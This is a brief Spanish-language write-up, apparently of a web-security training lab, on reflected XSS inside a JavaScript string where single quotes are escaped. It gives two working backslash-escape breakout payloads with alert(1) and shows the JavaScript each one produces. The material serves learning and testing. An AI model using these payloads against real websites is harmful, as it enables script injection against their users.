19 - Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

Nos dicen que las single quotes están solo escapadas , si escapamos la barra invertida podemos inyectar la comilla simple
Interceptamos las request y enviamos esto :

\'-alert(1)//

	var searchTerms = '\\'-alert(1)//';

\'+%2b+alert(1)//

	var searchTerms = '\\' + alert(1)//';